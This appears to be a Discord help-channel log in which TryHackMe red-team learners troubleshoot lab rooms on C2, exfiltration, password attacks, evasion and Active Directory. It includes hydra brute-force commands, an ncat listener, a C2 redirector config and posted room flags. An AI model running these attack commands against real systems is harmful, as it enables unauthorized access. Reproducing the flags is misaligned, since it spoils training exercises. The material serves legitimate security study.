Default Server:  ip-10-0-0-2.eu-west-1.compute.internal
Address:  10.0.0.2

> server 10.10.90.28
Default Server:  ip-10-10-90-28.eu-west-1.compute.internal
Address:  10.10.90.28

> ls -d thmreadteam.com
[ip-10-10-90-28.eu-west-1.compute.internal]
*** Can't list domain thmreadteam.com: Non-existent domain
The DNS server refused to transfer the zone thmreadteam.com to your computer. If this
is incorrect, check the zone transfer security settings for thmreadteam.com on the DNS
server at IP address 10.10.90.28.

> nslookup
Server:  ip-10-10-90-28.eu-west-1.compute.internal
Address:  10.10.90.28```

weird.

Reboot fixed the issue.

You were using the wrong Name It's thmredteam Not thmreadteam . @red oasis

It seems the rev-svc.exe might not be in c:\windows as expected

Did you get any update on why "login failed" wouldn't work?

I hope this isn't too much of a spoiler, but the "Runtime Detection Evasion" room is broken. Following the steps does not generate the flags consistently, it often takes multiple restarts of the room, and even then the flags are not consistent. This was noted on the forums multiple times as well as here on Discord.

If anyone else is stuck simply because the flags do not generate, the flags are below to save you time. Once again, I hope this isn't a spoiler -- the room is really straight forward and otherwise helpful and I encourage you to still work your way through it; the lack of consistency with the flags is just a tad bit frustrating 🙂

||Powershell Downgrade (Task 5)
THM{p0w3r5h3ll_d0wn6r4d3!}

Powershell Reflection (Taske 6)
THM{r3fl3c7_4ll_7h3_7h1n65}

Patching ASMI (Task 7)
THM{p47ch1n6_15n7_ju57_f0r_7h3_600d_6uy5}||

room: data exfilt | i'm getting a empty reply from server, what did i do wrong? 😫

Hey, does somebody know if it is possible to get the Virtual Machines used in the active directory module?

THM don't give out any of their machines.

I'll raise the topic again!)
Who still managed to capture the flag for this task, guys?!🤔

Hello! Im doing Introduction to Windows API room, is there a way to get the complete code?

I think you are forwarding about.html in port 80 to about.html in port 80. If I'm not mistaken the proxy will try accessing about.html in infinite recursion.

You still have recursion on that. When you are trying to access /about.html, that is still under /, so instead of loading the file, your server will try to proxy it to http://localhost:80/about.htmlabout.html.

If this is unclear, think of it this way: if you have ProxyPass "/apps" "http://backend.example.com/" and you try to go to /apps/app1, the requested will be proxied to http://backend.example.com/app1

to make your experimentation a bit easier, I'd make two vhosts on different ports to avoid proxying requests back to the proxy recursively

Need help on the Signature Evasion room Task 2. I watched the you video on the Task3 + hint for Task 2, i'm still quite puzzle by why the first byte is 51000 where the last bye is 50500 (0xC5FF). Need guide on this.

some of the question sites for eg Red Team OPSEC (task 7) are really vague and feel like a IQ test as there's zero explanation of what the intent is and you basically have to guess what the task is requiring you to do

getting a load of errors on the C2 armitage part on the attackbox

the UI doesn't load as a result of SSL errors

nvm

getting confused at the C2 tasks and specifically the proxy part

keep getting proxy errors

`xz≈Ωz']

Hello

on the redteam > host evasion > shellcode section they had this example of a loader in c to put your shellcode in i can not access it nomore since im not subscribe can someone with a subscription please please get me that loader
Message #red-teaming-path

Maybe asking for thing that is beyond a paywall on the discord of the site is not so smart?

Yeah youre. My apologies. My hackers fellows

I subscribed again and got it

I finally understand a little more shellcodes

.

having issue setting up the lateral moviment room dns to resolved the creds website. it seems i cannot nslookup the domain controller. any possible solution for that?

Hi guys 🙂 I have problem with starting team server in armitage. I have postrgresql version 14. ```
┌──(root㉿kali)-[/home/bodhi/armitage/release/unix]
└─# ./teamserver 192.168.64.3 P@ssw0rd123
[] Generating X509 certificate and keystore (for SSL)
[] Starting RPC daemon
[] MSGRPC starting on 127.0.0.1:55554 (NO SSL):Msg...
[] MSGRPC backgrounding at 2023-03-11 11:07:46 +0100...
[] MSGRPC background PID 33564
[] sleeping for 20s (to let msfrpcd initialize)
[] Starting Armitage team server
[] Warning: checkError(): org.postgresql.util.PSQLException: Uwierzytelnienie typu 10 nie jest obsługiwane. Upewnij się, że skonfigurowałeś plik pg_hba.conf tak, że zawiera on adres IP lub podsieć klienta oraz że użyta metoda uwierzytelnienia jest wspierana przez ten sterownik. at preferences.sl:419

** Error ** ** Error ** ** Error ** ** Error ** ** Error **

Could not connect to the Metasploit database. It's possible
that it's not running. Follow the database troubleshooting
steps at:

http://www.fastandeasyhacking.com/start

Also note: the latest Metasploit installer (4.1.4+) does not
create a postgres start script for you. This would explain
why Metasploit's database isn't running. To create one, put:

exec /usr/share/postgresql/scripts/ctl.sh "$@"

in /etc/init.d/framework-postgres. Then start the database:

service framework-postgres start

hi guys, do you have any good articles/blogs, etc. about numerous red-teaming ways/procedures where to find passwords on the systems and useful ways for later movement..
I am on red-team engagement and i am running out of options, i don't know where else to look for and to do, to get some creds., etc. thanks

i have a problem with armitage

the error is "startup failed, unsupported class file major version 61"

anyone have any ideas on how to solve it?

ok i know why java version has to be 11 in order for armitrage to be built

@barren shale

https://zer1t0.gitlab.io/posts/attacking_ad/

Its a little late but it may help

thank you for that, better late then never 🙂

Gave +1 Rep to @lime patio

Does anyone know how often the email is visited in the phishing room? I've set up the phishing as is described and double checked the different options, but it does not seem like I am getting any hits. Been waiting for around 20 min by now

Anybody know what im doing wrong here? I want to say this is a bug but i always assume user error with these things. Its telling me my answer is wrong for the version number in the enumeration room on task 3

root@ip-10-10-203-197:~# cat /etc/os-release 
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

What is the version number? 18.04.6 << My answer

Looks like you are checking it on your attackbox rather than on the target machine

Thank you

Gave +1 Rep to @native berry

i cant brute force smtp on task 8 of password attacks room because it gives me this error:either this auth is disabled etc..

i have used smtps and it still gives me this error anyone know what is occurring

I had this issue as well. The offensive engineer on me team tried it and informed me to try it over smpts on port 465 i believe. I think he did some kind of netscan to see where it actually was because its not the port it in the instructions

Alright will try this. Thanks

Ok I am brute forcing web page in password attack room. Trying to find out burgess password, its taking long. Is it supposed to take this long?

if it takes over 5 mins your command/commands are probably wrong

yeah it was that got it

I finished oscp on try hack me what I have to take next

how was it?

I am completely stuck with Task 7 of Red Team OPSEC. The hint does not clarify what the first and the second number in the sequence should be (first number = upper or lower sentences?). That pushes guessing the right combination to a brute force task. Is this intended? also, the hint states to use "-signs while the example in the submit box does not. So what is the format of the answer supposed to look like?

Hi

Your red team uses THC-Hydra to find the password for a specific login page. Moreover, they are using the Metasploit framework on the same system as THC-Hydra. Would you consider this an OPSEC vulnerability?

I answered this question "no", but it is supposed to be yes

How using both tools on same system can cause OPSEC vulnerability?

Hmm, nevermind I re-read relavant section again and figured it out

@gritty mango just wait till you hit Task 7. I you can figure that out, you gotta explain it to me 😉

someone got a solution for the "Unsupported class file major version 61" while setting up armitage?

solved it: downgrade openjdk to version 11 solved it

hi everyone

in the intro to C2 room in setting up the armitage it says build failed

i did a google search and it said that armitage has been deprecated for a long time now

should continue with the attackbox or what?

trying with the attackbox is probably worth it but dunno how to get it working so yeah

Hey

In tot browser I saw some site they have provideing PayPal a/c is it true?

Might be a scam beware. Looking at the url can also sometimes tell you.

hello

need your help for breachad vpn error

') if you want to connect to this serve
2023-04-03 11:58:33 ERROR: Failed to apply push options
2023-04-03 11:58:33 Failed to open tun/tap interface
2023-04-03 11:58:33 SIGUSR1[soft,process-push-msg-failed] received, process restarting
2023-04-03 11:58:33 Restart pause, 256 second(s)

getting an error

Are you on a VM?

yes sure

i use kali vm

Hi! Hello! Stuck on Task 8 "Online password attacks" in "Passwords attacks" section of "Initial Access" step. Question 3 :
Perform a brute-forcing attack against the phillips account for the login page at http://10.10.x.x/login-get using hydra? What is the flag?

My hydra command is:

hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^ HTTP/1.1:F=Login failed!" -f

The clinic.lst (that is suggested to be used as per official task hint) was created with:

cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/ and it contains 105 words.
The result is false positive. It is the same for other randomly checked wordlists (rockyou) and madeup usernames.

Apreciate any help! Thank you!

UPDATE: The same happens with next Question (asking to attack with POST and differently constructed wordlist).

Do you guys know when the room "https://tryhackme.com/room/introtoisac" will be available?

You can't access it?

you can install an older java version (apt install openjdk-11-jre). Then tell your system to use the old version (update-alternatives --set java /usr/lib/jvm/java-11-openjdk-amd64/bin/java) and armitage should run

does anyone know how to create a custom john rule with a special character at the end? The manual says: ?s but that triggers either an error or nothing

when using a GET request you should change F to S and check for successful logins instead

Question, looking at windows local persistence flag6 with the txt file. I noticed that my ps1 script does not handle filenames with spaces as args are seperated by spaces. Any better way to handle those?

Can also look for the 302 redirect header

Did you try using " " ?

Try the fuzzing with ffuf it is super fast

It is handled by the system so when you double click the file it sends %1 to the script but the script only sends arg0 to notepad which is everything to the first space

I worked around it with adding space arg1 to 5 but if the path has ore then would still fail opening the intended txt file and thus giving away something is wrong

Fixed it in the ps1 script use arg not arg[0] then it sends all of it

Anyone else struggle with the Data Exfiltration room or is it just me? lol

I had a question for people who have done "exploiting AD" or have AD vulnerability knowledge in general.
When I have access to a child Domain controller(say abc.za.tryhackme.loc) the Inter-Realm TGT would still give me access the DC of tryhackme.loc
If not always then under what circumstances?
Lastly, how can the domain trust issue be prevented without causing any issues for the general use(cross child-domain sharing etc)

pls tag me if you answer, thanks

What was your issue?

What's the best certificates to get for red teaming? Been following the recommended path on the website

I’ve had a few different ones honestly but pretty sure it’s just me being ignorant 😂

I want all name machines active directory in tryhackme

Did anyone else find Redteam Opsec room to be confusing as heck? 🤔 The whole task to get the flag for task 7 was really annoying to me. A lot of the examples felt very vague and confusing.

IT all made sense until I did task 7 and then it was confusing ordering the events. (It could be related to me being a noob, but that task just confused me for a few hours)

Also for the weaponization room (task 6) why is it necessary to add -ex bypass to this command after changing the Execution Policy using
PS C:\Users\thm\Desktop> Set-ExecutionPolicy -Scope CurrentUser RemoteSigned?
When I tried to just run
C:\Users\thm\Desktop> powershell -File thm.ps1
it just worked without needing the bypass, after I swapped the execution policy.

Yes, task 7 was really confusing, don't worry about it, a lot of us felt that way

If you changed the execution policy, it is changed for the rest of the shell session I think, so adding -ex bypass should not be necessary I think (I don't know much about powershell, so If someone can confirm this would be nice)

So would -ex bypass be for if I didn't change the execution policy? 🤔

In Red Team Engagements, task 8 Operations plan, what does point 2 refers to?
"""In the event of an operator being burnt, information will be kept on a need to know basis"""

Yes, if you don't change the execution policy using Set-ExecutionPolicy you then need to specify the bypass when executing the script

Oh gotcha 🙂

otherwise it will use the default execution policy that is not allowing the execution of scripts, so it won't work

:)

Yeah :p Sorry for the late response but thanks for answering!

.

Anyone knows what this refers to?

how to get red teamer tag in thm?

but i’m learn full path of red team

it was an event on tryhackme when this path was new... you got tickets for completing rooms on this path and when you got 3 for the red teamer role you got it on the site and on here

thx

Gave +1 Rep to @royal void

to get your level role on discord you verify with the bot using the instructions found here

!docs verify

oh

thx x2

Gave +1 Rep to @tulip mauve

URL For start room ?

what you mean?

htb

having trouble with downloading latermal movement network vpn config file trying to import for lateral movement and pivoting section its like on a loop saying connected then keeps refreshing and dcing

Hello, I am currently in the passwords attack room, and I am having problems cracking the SMTP

I use this command hydra -S -l pittman@clinic.thmredteam.com -P ./clinic2.txt -s 587 -v smtp://10.10.188.149

But I keep getting this error

Could not create an SSL session: error:0A00010B:SSL routines::wrong version number

Can someone please tell me what I am doing wrong 🙏? I can't seem to find any useful answers online

the output from hydra -U smtps might help guide you.

Hi

Currently in the Introduction to Windows API room, and how do I go about understanding the syntax in the tasks?

hi guys, i am in now in this path and my hope is to become pentester so i wonder if this path would help me in my penetration testing engagement instead of red team

The most interesting rooms in this path are in Post Compromise, as they show you the steps you should take for penetration testing engagements.

What type of method is used to reference the API call to obtain a struct?

thank you but i think i think network security would help because sometimes you need to bypass some firewalls and ips

Gave +1 Rep to @regal dust

it depends on the programming language

on the data exfiltration room red team path in task 9 exfiltration over dns my command is not working splitting the content into a single dns request

So I just reached Breaching Active Directory and in the corner, it says I only have 2 days of access left. What does that mean? Will it go back up with my subscription or do I only have 2 days to finish all the networks?

It just means that you'll have to rejoin the room after that, you'll have a different subnet but your progress will remain.

Okay thanks friend! (:

Gave +1 Rep to @small citrus

Is the 7 day streak required for subscriber users as well to access "Red Team Capstone" Challenge??

I'm not sure about this, I saw that it is available to normal users till June 5.

Yes.

You need both.

:/

Not going to lie that I'm little disappointed that even membership subscribers have to wait 7 days to get your hands-on to the new Red Teaming challenge.

In the announcement it said about steak

Not like you were not warned

I saw the announcement today. Was there an announcement about needing 7 days streak before than today? If there was one then I apologize because apparently I missed that.

the first hint for it was 2 weeks ago where they said to keep up your streaks

You're right. I went back and looked on LinkedIn. Completely missed that post 😂

just posting as some feedback, red team OPSEC task 7 is way too unnecessarily confusing and there's nothing that would really explain what it wants you to do, and even after looking online and understanding what you're meant to do, the questions(statements?) are still incredibly vague and it becomes more of a guessing game than anything

are the armitage tasks completely outdated? It feels like none of the instructions actually work like they should

ok so apparently armitage is deprecated? How should I go through the tasks in that case? is there any point to learning armitage or should I just look up a guide on some other C2 framework?

Good day,
I am trying the windows local persistence room, using attackbox, but even at the first step I am bleeding out. Adding a registry is just not working...

Am I the only one, or is this tricking others too?

same

im trying to build the current release and im running into errors

Windows Internals, Task #2. Logfile.PML is missing for download

Sorry for trouble, it' s on the machine.

I ended up just doing the practical task using metasploit and looked a bit into sliver as an alternative

ohh alright

also were u able to make the vba script using msfvenom and get a reverse shell?

my msword seems to crash any time i run the script

I skipped doing the msfvenom script because I couldn't figure out how to copypaste into the windows VM lmao

I have some troubles with Data Exfil room
In task with http and https I can't curl data to 80 port of web.thm.com
I tried to troubleshoot this problem and found that 80 port is closed

I found only 3 ports opened on this host: ssh (22), one TCP (33963) and one UDP
I can't restart apache (maybe because it is Docker)

What can I do?

I've restarted machine, it works

can someone tell me why im getting this?

do you know why I get this error?

this seems to be outdated (Enumeration room)

snmpcheck didn't work, used snmpwalk

Hi, everyone! When starting to pentesting, is kali Linux image suitable?

Thanks for the replies!

Hey guys, I was going through the Intro to C2 module and faced issues setting up a redirector. I followed the steps mentioned in the module, but all the requests to the redirector are getting forwarded to the C2. Has anyone else faced this issue?

I have added these lines in the /etc/apache2/sites-available/000-default.conf file:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "blahblah"
ProxyPass "/" "http://localhost:8888/"

is going the red team path a good idea or should I just focus on SOC for my first cybersecurity job?

I say do whatever seems fun

tryhackme is a good starting point to understand pentesting, but I'm not sure the certificates they give you for completing a path will necessarily result in a job

They're not certifications.

More certificates, "Well done, yoyu took part"

It's a good way to show a potential employer that you enjoy learning and doing stuff, even as a hobby.

is it intentional that this AD lateral movement and pivoting room is in the Post Compromise Module?

it shows up twice in the red team path since it's also in the AD module (which is the last module)

and there's like 3 AD rooms that are prerequisites so this placement seems really weird

good question actually

but yeah it has to do with post compromise so shadow thought it fitted in both... still maybe ask some content person

yeah I just found it weird since the room wants you to do AD basics, BreachingAD and ADenumeration first, which all come in order later in the AD module, but that's not everything in the AD module either so now you're doing everything in a weird order

guess it doesn't really matter that much at the end of the day but thought I'd mention it anyway

probably something @white prairie decided... but dunno if he got the power to change it or if it would have to go ot others

Lateral Movement and pivoting is a special case. You can technically complete the room in isolation before you do the other AD modules. Since the techniques shown there are Windows techniques more than they are AD techniques. But then revisiting the content as you learn AD will just clear up how local users might get those permissions

thanks for the explaintation

Gave +1 Rep to @white prairie

Anyone can help resolving the DNS of THMDC ? i can ping but cant do nslookup ,using NetworkManager

it does not always work as intened even if you are connected to the correct network vpn.... so either try and reset the network or play subnet roulette where you leave and rejoin the network room to get a new subnet hoping it works

Alright thank you shadow ,gonna try that

good luck and also have fun

hmm i think i found the issue ,even on attackbox i cant find breach interface

ip address show in terminal

Yup ,its not there 🙂

did you start the attackbox from the network room???

i think its for subscribed memberships ,even tho they havn't mentioned that

if not that would kinda explain it

Yes i did start it

my brother has subscribed account ,i tried on his pc + account,and it works

what interfaces do you have?

i saw many interfaces but non are named " Breached"

yes, but what do you have?

also was not able to ping the THMDC

do not recall what the one shadow got was... and kinda late to check now

i mean in the attackbox

but its clearly not working for unsubscribed accounts thats why ..

breaching and enumerating active directory are free networks

well not anymore 😄

or maybe there is something wrong happening dunno but im pretty sure

this is from my brother account

gonna sub later and find out

there hasn't been any change, and it's hard to help without all the information

what information u need ?
u can try with unsubscribed account as i did to see if its working

your initial screenshots are from a Kali VM?

yes from my local machine

does that create a new interface for you?

yes it does "breach" interface

able to ping THMDC ,but can resolve dns

cant *

yeah hence the problem is not with the attackbox

but with your current THMDC not doing what it is supposed to

you will need to regen said vpn file if you leave and rejoin the network room too

you probably have to edit your /etc/resolve.conf and have the THMDC IP on top

same steps
2 openvpns one subscribed .. the other is not

works for the subscribed one

but not to the other

very clear what is the issue 😄

Sigh

its set correctly ,and works for the subscribed account my friend

no they do not lock the none subsribers out from the free networks

if they did why even mark them as free to begin with

well ,this issue is there ,maybe they are not ,but its there

the problem is you get different subnets and sometimes the THMDC has crashed

hence there are multiple DC:s that can handle it if you change subnet

but if you change subnet your old vpn file will not work so you need to make a new one

i tried to change the subnet ,i keep getting back to the same one 😄

leave --> join ... repeat

leave wait 3-15 mins... rejoin

regen vpn

connect

try again

technically making people share subnets also cuts costs but they need multiple ones or they will be getting reset all the time or people will break it and other nasties

Both subscribers and free users share the same networks

We don’t block or filter your connection if you’re a free user, why would we? 🙂

oooh thanks for piping in @honest cape

Gave +1 Rep to @honest cape

Also, if you’re using your friend’s OpenVPN file, it’s probably on a different subnet

Hi Jason ,thanks for you clarifications ,im just addressing what i have found and differences ,but anyway u are the expert here thanks alot for ur responds ❤️

Gave +1 Rep to @honest cape

Can i DM u please ?

Regarding? 🙂

Hello everyone!
May I ask one think
#room-bugs message
I didn't understand why this happening and I though it was bug.

im running snmpchecker in enumeration windows im not getting a response

Hello, hope this is the correct place to ask this. Anyway, doing Red Teaming Signature Evasion task 7 and I'm trying to understand the answer in the walkthrough. So in the answer it says "If you inspect the binaries IAT table as discussed in task 6, you will notice there are roughly seven unique API calls that could indicate the objectives of this binary." How did they find that number? I've used Objdump -d and also ida pro free version. Is it correct to look at the "Imports" tabs once I've loaded the PE? Like in the picture below?

Sorry, I cant add picture for some reason. But there are 7 names that calls these two libraries WS2_32 and WSOCK32. Does calls to Kernel32 count?

Im just having trouble making sense of this so if anyone have good resources I could read that would be nice. Thanks for the help

I found a post that said snmpcheck has problems and to use snmpwalk which is also built into kali

Hi can someone help me with payload?

looking for help with task 6 in runtime detection evasion have the flag but it says wrong one it is the only flag that comes up after entering the oneline into powershell

Anyone having problem with autoopen running macro'

The program does two things, really -> make a network connection out, and start then wait on a process. The seven calls are all network-related functions, so we're really just hiding from strings/objdump/etc that we make a network connection.

In the enumerating AD room there is no start machine button, when I start attackbox there is no interface enumad neither to find on access page

WHAT am I doing wrong please?

Hi everyone i am stucl on data exfiltration task6

When i put this command i get :

curl --socks5 127.0.0.1:1080 http://flag.thm.com/flag:80 <p><a href="/flag">Get Your Flag!</a></p>

but i don't get the flag

Can you help me please

maybe try get rid of :80?
curl --socks5 127.0.0.1:1080 http://flag.thm.com/flag

Yeah thanks 🙂

I 'am so stupid sometimes

Thanks Gray

problem Solved

hahah understandable, np

task 3 exploiting ad: i try to create a PS session to thmserver1 and I can't. I already imported all the tickets

im using attackbox

nevermind, figured it out

Hello everyone, im stuck on windows internal room task2

How did you find the ID process for notepad.exe with Procmon

It's good. Problem is solved

use filter and select process name is notepad.exe include

delete other process with cross barred. Thank 🙂

running through the red team path and am on the "red team threat intel" room working on task 7 (trying to map TTPs from MITRE ATT&CK to the Cyber Kill Chain) - I'm looking at the ATT&CK Navigator for APT41 and am super confused as to what I'm supposed to actually put in the kill chain with the first part of the task. does anyone remember this/can help point me in the right direction?

just kidding, I was going backwards

Hi everybody, i don't found answer at this question

What is the memory allocation type of 0x00080000 in the VirtualAlloc API call?

What type of method is used to reference the API call to obtain a struct?

anyone skilledi n armitage?
I have a problem where I dont get my little icons showing inside the GUI window

Does anyone have an idea why I get this error when trying to start the teamserver?

I can't find the armitage.jar file anywhere on my system.

I've installed armitage with apt install btw

find / -iname armitage.jar 2>/dev/null ???
because that would search your entire system for a file with the name armitage.jar not case sensitive and also send errors to the void

@cinder sierra ⬆️

armitage has been deprecated long time ago and some of the room instructions are inaccurate too, will cause some problems

that room is a skipper imo, but if you wanna do it you might have to do some reasearch on how to make it run

doing it on the attackbox might work as well

thanks shadow! Found it that way, but the next error popped up. Really weird...

Gave +1 Rep to @royal void

Thanks kii! I solved that problem but the next one popped up directly. I'll play around with it a little more and skip it if I can't solve it. What C2 would you recommend that's up to date?

well you could just use the regular metasploit cli, but you can also look at the different ones they listed in task3, personally I installed sliver and looked into it a bit because I thought it looked cool

you can take a look at the c2matrix as well

ICMP Data Exfiltration
i do it with vpn in my machine
i open msfconsole with all setting as in the task
i did nping in the thm@icmp-host machine - but its not seem to sent to my msfconsole to get it

any idea why ?

Hello, I have some trouble with the data exfiltration room (dataxexfilt) at task 7 ( Exfiltration using ICMP)
When I try to run the metasploit icmp_exfil script with the eth0 interface on the attackbox, it says that the interface eth0 does not exist, and indeed it doesn't exist on the attackbox
Should I use another interface instead ?
Or did I miss something ?

Okay, I had to use another interface 👌

what interface did you use here?

If you type ip a s

I think it's ENS5

let me try it out.

I dont remember unfortunately, but I tried each one util it worked

hi

it is showing wrong password

Make sure the account you are using to transfer the file matches the one you provide to the smbserver script. It looks like you issue the copy command using Administrator instead of thmuser1

I found the solution, i didn't added it in the "remote management users" group

Thankyou @echo ore bts

Btw*

Hi Legends, can you guys share me with your thoughts(and reasons) that you are diving into #red-teaming-path instead of #offensive-pentesting-path after you've done your jr pentester. I've done my jr pentester 5months ago and thinking of a furth pathway. Thx legends😻

#general message

Hi

I am getting an erroe

Error*

In local persistent > tempering with unprivilaged accounts > RID hijacking

When i m changing the RID then evil-winrm is giving this error

Amd if i try to login without changing RID.. it giving me the access

does Anybody knows about it?

I gave all perms
Added in all groups
Already set LocalAccoutTokenFilterPolicy to 1

Got the solution

evil-winrm is giving glitchs in it
use REMMINA

Instead

Hello,
I'm searching for dedicated CTF players to stick with our team for the long time. We achieved a ranking of 70 on Enowars 7 with just three players. DM me if you're interested

Hi all, I am new to tryhackme, very new to infosec, and my intended career path is red team. Does anyone have any input on which modules to prioritize on the website, aside from the obvious? Thanks

Depends on where you are starting from. Have you any other IT experience? If not fundamentals are important, and such the "fundamentals" modules (or perhaps beginner path?) can be recommended

Yeah, I know some basics, but not like someone who’s worked in IT. More like being a hobbyist teen on IRC and Linux.

I’ve done, on tryhackme, the “introduction to cybersecurity”, and am midway through “pre security”

From there, I was assuming I should start with “red teaming” next

Also, these modules looked appealing:
-Network security
-nmap
-initial access
-red team fundamentals
-introduction to offensive security
-recent threats
-compromising Active Directory
-Linux fundamentals

Just go for it, if its appealing and interesting for you it's easier to learn. If you ever get stuck or something is confusing you can always go back to the basics 🙂

If it's intended to eventually get a job in red teaming the fundamentals can be quite important, but there are plenty of resources available to research online for what employers want in a red-teamer

Thanks 🙏

Gave +1 Rep to @proper root

pwndbg> info functions
All defined functions:

File loop.c:
2:    int main();

Non-debugging symbols:
0x0000000000001000  _init
0x0000000000001030  printf@plt
0x0000000000001040  __cxa_finalize@plt
0x0000000000001050  _start
0x0000000000001080  deregister_tm_clones
0x00000000000010b0  register_tm_clones
0x00000000000010f0  __do_global_dtors_aux
0x0000000000001130  frame_dummy
0x0000000000001178  _fini
pwndbg> 
``` where is the main function?

try info address main Or s *main

Hi everyone. In the "Red Team Threat Intel" room, during Task 7, what's the proper way of finding the answers to these questions?

What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers?
What tool does APT 41 use to mine and monitor SMS traffic?

Is one supposed to read everything in the ATT&CK Navigator page and find the answers? For example for the MESSAGETAP there was no "SMS" keyword anywhere, and for the certutil, there seem to be other answers like "ShadowPad" and "ZxShell"

Yes you should be able to navigate att&ck and find the answers you need, don't just look for the answer, take the opportunity to do some proper research on APT 41

But how would I know for certain which one is the answer to the question without trying all possible answers?

If the APT has multiple tools used for the same thing, you have to try all the ones you think. If none of them are right you are not looking at the right thing.
If one is right and you don't know why, try again and in case you cannot figure it out, look up a walkthrough/write up

The target allows Telnet traffic. Using ncat, how do we set a listener on the Telnet port?
ansver:ncat -nlvp 23

no
Why not accept the answer?

try: nc -lnvp 23

i need some help in this task

How can i fix it? ;-;

i try to research but I can't do it

i try to upload file loot.zip to bloodhound but it's alert BAD JSON

check if your version of sharphound is compatible with your version of bloodhound

@covert narwhal ⬆️

You should use sharphound.exe. Powershell module is oldest version so you cant use this json files on new version bloodhound.

thank you i will try it

@tulip mauve @forest sequoia @static scroll @zealous wind Have you managed to solve the task 10 in Evading Logging and Monitoring?

Hi!
No, it didn't work out.
I've tried a lot of things.
But as if something is wrong on the machine itself.
This was the last task in the module.
I spat on it and just found the flag in the file itself.😎

Sweet... OK, thanks, task resolved.

Gave +1 Rep to @tulip mauve

What should be configured between two domains for a user in Domain A to access a resource in Domain B? Ansewer : A Trust Relationship (Don't you think the answer should be B Trust Relationship? It was written to be the opposite direction? )

it is a as in the word a and not the letter a

Hello guys

Where can i get the learning path for pentester

Unfortunately, completing the learning paths are limited to subscribers only.

Tryhackme is down . Tryhackme website is unreachable wtf

what exactly does it mean when your computers domain is WORKGROUP

From my understanding workgroups are more centralized in access and permissions than on domains.

Hi everyone....I am a beginner in Cyber Security field. Can someone suggest me learning path as well as some useful resources to start my journey.

Should be a basic cyber fundamentals module or pathway.

Any recommended resources?

for me it works best practicing so i just spam rooms

if i get stuck or have literally no idea how to continue i check writeups

although i think this might work better for those who have a bit more knowledge

if you're just starting i'd recommend you watch videos or read some writeups to understand that every ctf is basically the same methodology: enum, exploit, priv esc

i dont speak that language

WORKGROUP stands for non-domain, such as your computer. A domain is used to centrally control multiple clients actually.

ty

hey im ikeep getting error i did exactly as in the task but Rubeus error

anyone please help

@white prairie can u help

Which room you finding this in?

im in Persisting Active Directory

task 4

Can you authenticate to the domain controller and run gpupdate /force and see if that fixes the issue for you? TL;DR the CA cert expired, we are busy with upkeep for these networks which will remedy the issue, but in the mean time you can just ask the CA to regen its own cert again

what u mean by that - authenticate to the domain controller

just doing ssh like that?

Remote desktop to the DC using your Administrator credentials, open command prompt, and run gpupdate /force

in what kind

oh fine

no problem i try

If that does not solve it for you, let me know and I'll give you the second set of steps for it

Also worth noting that even if PKINIT does not work, you can still use that cert with SCHANNEL authentication through something like certipy. If you ever run into this on an assessment

after gpupdate in the machine i remmina to it
and i try the command again but still

maybe pic not clear but same error

Okay, then we do it the long way around:

On the domain controller:

1. Start
2. run
3. mmc.exe
4. File -> Add-snapin
5. Look for the Certificates snap-in, but add it for the computer account when it asks
6. Expand certificates
7. Right click on personal, all options, request new certificate
8. Follow prompts and enroll for the available certificate templates
9. Once enrolled, should work again

ok i do it
then i choose as in pic 1
but when i arrive to pic 2 it say certificate types not available

@white prairie what u say on that
im really stuck in this

You need to do this on the domain controller. You are currently on WRK1

Domain controller is .101 or .100

This one here:

100 is root no access to it
i do to child dc is 101 i success

yea

im on it

So whatever your IP is, authenticate to that one and then do the MMC changes there

certificate template
certificate
certifiacte authurity

which snap i should choose?

certificate, and then select computer account

local computer or another computer

give me choices

Local, since you are already on the domain controller

@white prairie

I think you are still enrolling from the wrong location. Send me the remote IP in your OVPN file and I'll push the fix for you

im as admin on 101

my virtual ip on persistant is 10.50.59.174